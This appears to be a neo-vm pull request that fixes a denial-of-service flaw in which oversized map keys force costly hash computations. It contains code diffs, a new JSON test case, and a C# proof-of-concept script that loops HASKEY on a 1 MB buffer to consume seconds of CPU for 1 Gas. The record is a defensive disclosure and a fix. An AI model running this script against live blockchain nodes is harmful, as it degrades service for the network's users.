### PR TITLE
Prevent DoS by GetHashCode

### DIFF
--- a/src/neo-vm/Types/ByteString.cs
+++ b/src/neo-vm/Types/ByteString.cs
@@ -39,6 +39,9 @@ namespace Neo.VM.Types
 
         public override int GetHashCode()
         {
+            if (Size > MaxComparableSize)
+                throw new InvalidOperationException("The operand exceeds the maximum comparable size.");
+
             unchecked
             {
                 int hash = 17;

--- a/src/neo-vm/Types/ByteString.cs
+++ b/src/neo-vm/Types/ByteString.cs
@@ -39,9 +39,6 @@ namespace Neo.VM.Types
 
         public override int GetHashCode()
         {
-            if (Size > MaxComparableSize)
-                throw new InvalidOperationException("The operand exceeds the maximum comparable size.");
-
             unchecked
             {
                 int hash = 17;

--- a/src/neo-vm/Types/Map.cs
+++ b/src/neo-vm/Types/Map.cs
@@ -59,7 +59,8 @@ namespace Neo.VM.Types
 
         public bool ContainsKey(PrimitiveType key)
         {
-            if (key.Size > MaxKeySize) return false;
+            if (key.Size > MaxKeySize)
+                throw new ArgumentException($"MaxKeySize exceed: {key.Size}");
             return dictionary.ContainsKey(key);
         }
 
@@ -85,7 +86,9 @@ namespace Neo.VM.Types
 
         public bool Remove(PrimitiveType key)
         {
-            if (key.Size > MaxKeySize || !dictionary.Remove(key, out StackItem old_value))
+            if (key.Size > MaxKeySize)
+                throw new ArgumentException($"MaxKeySize exceed: {key.Size}");
+            if (!dictionary.Remove(key, out StackItem old_value))
                 return false;
             ReferenceCounter?.RemoveReference(key, this);
             ReferenceCounter?.RemoveReference(old_value, this);
@@ -95,11 +98,7 @@ namespace Neo.VM.Types
         public bool TryGetValue(PrimitiveType key, out StackItem value)
         {
             if (key.Size > MaxKeySize)
-            {
-                value = null;
-                return false;
-            }
-
+                throw new ArgumentException($"MaxKeySize exceed: {key.Size}");
             return dictionary.TryGetValue(key, out value);
         }
     }

--- a/src/neo-vm/Types/Map.cs
+++ b/src/neo-vm/Types/Map.cs
@@ -59,6 +59,7 @@ namespace Neo.VM.Types
 
         public bool ContainsKey(PrimitiveType key)
         {
+            if (key.Size > MaxKeySize) return false;
             return dictionary.ContainsKey(key);
         }
 
@@ -84,7 +85,7 @@ namespace Neo.VM.Types
 
         public bool Remove(PrimitiveType key)
         {
-            if (!dictionary.Remove(key, out StackItem old_value))
+            if (key.Size > MaxKeySize || !dictionary.Remove(key, out StackItem old_value))
                 return false;
             ReferenceCounter?.RemoveReference(key, this);
             ReferenceCounter?.RemoveReference(old_value, this);
@@ -93,6 +94,12 @@ namespace Neo.VM.Types
 
         public bool TryGetValue(PrimitiveType key, out StackItem value)
         {
+            if (key.Size > MaxKeySize)
+            {
+                value = null;
+                return false;
+            }
+
             return dictionary.TryGetValue(key, out value);
         }
     }

--- a/tests/neo-vm.Tests/Tests/OpCodes/Arrays/HASKEY.json
+++ b/tests/neo-vm.Tests/Tests/OpCodes/Arrays/HASKEY.json
@@ -206,6 +206,71 @@
           }
         }
       ]
+    },
+    {
+      "name": "Check key size [Map]",
+      "script": [
+        "NEWMAP",
+        "PUSHINT8",
+        "0x41",
+        "NEWBUFFER",
+        "CONVERT",
+        "0x28",
+        "HASKEY"
+      ],
+      "steps": [
+        {
+          "actions": [
+            "stepinto",
+            "stepinto",
+            "stepinto",
+            "stepinto"
+          ],
+          "result": {
+            "state": "BREAK",
+            "invocationStack": [
+              {
+                "instructionPointer": 6,
+                "nextInstruction": "HASKEY",
+                "evaluationStack": [
+                  {
+                    "type": "ByteString",
+                    "value": "0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
+                  },
+                  {
+                    "type": "map",
+                    "value": {}
+                  }
+                ]
+              }
+            ]
+          }
+        },
+        {
+          "actions": [
+            "stepinto"
+          ],
+          "result": {
+            "state": "FAULT",
+            "invocationStack": [
+              {
+                "instructionPointer": 6,
+                "nextInstruction": "HASKEY",
+                "evaluationStack": [
+                  {
+                    "type": "ByteString",
+                    "value": "0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
+                  },
+                  {
+                    "type": "map",
+                    "value": {}
+                  }
+                ]
+              }
+            ]
+          }
+        }
+      ]
     }
   ]
 }


### PR DESCRIPTION
Map checks if the key it's longer than 64 bytes, but it's possible to bypass this and force to call `GetHashCode` with a 1024*1024 stack item using other opcodes like `HASHKEY`

Proof of Concept:

```csharp
[TestMethod]
public void TestDosByteString()
{
    TestBlockchain.InitializeMockNeoSystem();

    using var script = new ScriptBuilder();

    script.EmitPush(1024 * 1024);
    script.Emit(OpCode.NEWBUFFER);
    script.Emit(OpCode.NEWMAP);
    script.EmitPush(64);
    script.Emit(OpCode.NEWBUFFER);
    script.Emit(OpCode.INITSLOT, new byte[] { 0, 3 });

    script.Emit(OpCode.LDARG1);
    script.Emit(OpCode.LDARG0);
    script.Emit(OpCode.CONVERT, new byte[] { (byte)StackItemType.ByteString });
    script.Emit(OpCode.LDARG0);
    script.Emit(OpCode.SETITEM);

    script.Emit(OpCode.LDARG1);
    script.Emit(OpCode.LDARG2);
    script.Emit(OpCode.CONVERT, new byte[] { (byte)StackItemType.ByteString });
    script.Emit(OpCode.HASKEY);

    script.EmitJump(OpCode.JMP, -5);

    var sc = script.ToArray();
    var snapshot = Blockchain.Singleton.GetSnapshot();
    var st = new Stopwatch();
    st.Start();

    using var engine = ApplicationEngine.Run(sc, snapshot: snapshot, gas: 1_0000_0000);
    engine.LoadScript(script.ToArray(), -1, 0);
    engine.Execute();

    Console.WriteLine(st.Elapsed.ToString());
}
```

Only one transaction with 1 of Gas could spend more than 3 seconds.

**Found by: Red4Sec**